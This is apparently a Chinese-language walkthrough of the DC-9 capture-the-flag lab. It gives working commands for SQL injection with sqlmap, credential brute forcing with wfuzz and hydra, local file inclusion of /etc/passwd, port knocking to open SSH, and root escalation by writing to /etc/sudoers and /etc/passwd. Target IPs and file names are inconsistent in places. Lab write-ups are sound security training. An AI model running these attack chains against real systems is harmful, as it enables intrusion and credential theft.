信息收集
存活主机及其端口探测
nmap -sn 192.168.124.0、24
nmap -sS -A 192.168.124.21
目录扫描
网站banner信息收集
通过测试,发现sql注入
漏洞利用
sql注入
把请求信息导出为dc9.txt,接下来用SQLmap进行遍历
sqlmap -r dc9.txt
接下来使用sqmap导出数据
sqlmap.py -r dc9.txt ‐‐dbs
sqlmap.py -r dc9.txt -D users --tables
sqlmap.py -r dc9.txt -D users -T UserDetails --columns
sqlmap.py -r dc9.txt ‐D users ‐T UserDetails ‐C username,password --dump
sqlmap ‐r dc9.txt ‐D Staff ‐T Users ‐C Username,Password ‐‐dump
得到一堆账号密码和管理员账号及其密码hash,通过md5解密网站得到密码
管理员账号:admin
管理员密码:transorbital1
将所有的账号,密码进行整理,分别整理到usename.txt,password.txt
用wfuzz进行批量登录查看页面反应,只有管理员的账号是302
wfuzz -c -z file,username.txt -z file,password.txt -m zip -d 'username=FUZZ&password=FUZ2Z' http://192.168.124.21/manage.php
然后我们用管理账号进行登录,发现file does not exist(猜测文件文件包含)
文件包含
用wfuzz尝试进行遍历一下参数(注意这里需要添加cookie)
字典:http://github.com/danielmiessler/SecLists
-b:cookies -hw:隐藏指定字节数的结果 -w字典文件
wfuzz --hw 100 -b 'PHPSESSID=oshc5jht0a15efnue128kdnn9n' ‐c ‐w
/usr/share/SecLists/Discovery/Web‐Content/burp‐parameter‐names.txt
http://192.168.56.112/manage.php?FUZZ=index.php
wfuzz ‐‐hw 100 ‐b 'PHPSESSID=oshc5jht0a15efnue128kdnn9n' ‐c ‐w
/usr/share/SecLists/Discovery/Web‐Content/burp‐parameter‐names.txt
http://192.168.56.112/manage.php?FUZZ=../../../../../../../../../etc/passwd
这里我们就找到参数file
通过/proc/sched_debug 来查看Linux系统中任务的调度情况
查询发现靶机上运行这knockd
关于knockd的介绍:https://blog.csdn.net/nzjdsds/article/details/112476120
端口保护之端口敲门(knocked)
就是按一定的顺序访问端口可以达到开启和关闭某个端口的机制
包含这个文件可以查看端口敲门的策略/etc/konckd.conf
options]
UseSyslog
[openSSH]
sequence = 7469,8475,9842
seq_timeout = 25
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9842,8475,7469
seq_timeout = 25
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
提供2种敲击方法:nc、nmap
for x in 7469 8475 9842;do nmap ‐Pn ‐‐max‐retries 0 ‐p $x 192.168.56.112;done
for x in 7469 8475 9842 22 ;do nc 192.168.56.112 $x;done
经过上面的敲击后,22端口被打开,此时就可以使用hydra和之前sql注入的账号密码爆破ssh
hydra -L username.txt -P password.txt ssh://192.168.124.21
成功爆破出三个用户
我们对这几个账号都尝试进行登录,在janitor发现了隐藏文件
我们把这些密码加入到password文件中,成功多爆破出一个账号密码尝试登录。同时,我在janitor使用提权工具LinPEAS来探测下可利用的点,未发现利用点。
下载地址:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
登录新爆出的账号后,查看权限,发现一个root运行的test文件
sudo -l
在上一层目录发现源码,代码的意思是将第一个文件的内容写入第二个文件中。
提权
法一
往/etc/sudoers里面添加内容,让用户可以以root的权限去执行命令
创建/dev/shm/sudoerAdd,内容如下:
joeyt ALL=(ALL) ALL
然后执行
sudo /opt/devstuff/dist/test/test /dev/shm/sudoerAdd /etc/sudoers
登陆joeyt,然后切换成root身份,get flag
法二
添加一个新的用户到/etc/passwd,然后新添加的用户登陆
用Openssl来对密码进行加密,在进行编辑输入到/tmp/new-passwd
openssl passwd ‐1 ‐salt 123456 dfz
echo "dfz:$1$123456$1VU0YpuL7WOQvLLyYTbbv1:0:0:root:/root:/bin/bash" >> /tmp/passwd
然后把/tmp/new-passwd写入到/etc/passwd
sudo /opt/devstuff/dist/test/test /tmp/new‐passwd /etc/passwd
提权成功。
